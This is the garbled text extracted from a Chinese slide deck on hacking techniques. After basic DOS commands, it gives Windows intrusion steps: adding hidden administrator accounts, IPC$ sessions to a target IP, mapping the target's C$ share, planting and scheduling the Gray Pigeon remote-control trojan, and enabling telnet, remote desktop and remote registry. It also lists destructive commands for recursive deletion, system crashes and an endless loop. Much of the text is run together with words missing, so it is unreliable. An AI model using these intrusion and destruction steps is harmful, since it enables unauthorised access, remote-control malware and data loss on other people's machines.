网络安全攻防技术教程.ppt

章节目标常用的DOS命令常用的入侵命令Hack实战一:命令行下的入侵Hack实战二:图形界面的入侵流行远程控制木马的使用方法键盘记录程序的使用方法Page2常用DOS命令1Cd切换目录Dir列出所有文件信息Del删除文件Md创建目录Rd删除目录Copy复制Xcopy复制文件和文件夹Cls清屏Attrib修改文件、文件夹属性Date、Time显示日期、时间Page3常用DOS命令2Path系统路径Set显示、设置系统信息Ren(Rename)重命名Subst虚拟磁盘Ver显示操作系统版本Help帮助/?: startcmd %: for/r/d%ain(*)"%a"/: for/l%ain(1,0,2)"炸弹来了!",蓝屏 ntsd-cq- ntsd-cq-: del*/a/s/q/: md(按住Alt键,在小键盘上按2,5,5,然后松开Alt,回车): md\\.\c:\con md\\.\c:\: mdtest..\ rdtest..\/s/user用户名密码/add(localgroupadministrators用户名密码/add(将用户加到管理员,userguest/active:Yes(userguest12345(user(use\\ip\ipc$“”/user(use\\ip\ipc$“密码”/user:“用户名”(建立IPC非空连接,use\\ip\ipc$/del(usez:\\\c$(映射目标主机磁盘c盘到本地磁盘Z盘)start(start服务名(time\\目标IP(view(share(shareC$/del(stat-an(查看计算机开放了哪些端口)\\ip\admin$\System32($共享的System32目录内)onfigtlnesvrstart=auto(服务的启动方式为自动,ess(sendIP消息(利用messenger服务向目标IP发送消息)ntsd-cq-(蓝屏重启)ntsd-cq-(死机)tasklist(查看进程)taskkill(结束进程)Page9实战:use\\\ipc$“123”/user:”time\\:\\\\admin$\\\:00startc:\windows\,对方就中了灰鸽子服务端了。服务: scconfigtlntsvrstart=auto(auto前有空格)开启3389远程终端 sharec$=c:开启计划任务服务(at命令需要这一服务) netstartschedule开启远程注册表(RemoteRegistry)startremoteregistryPage11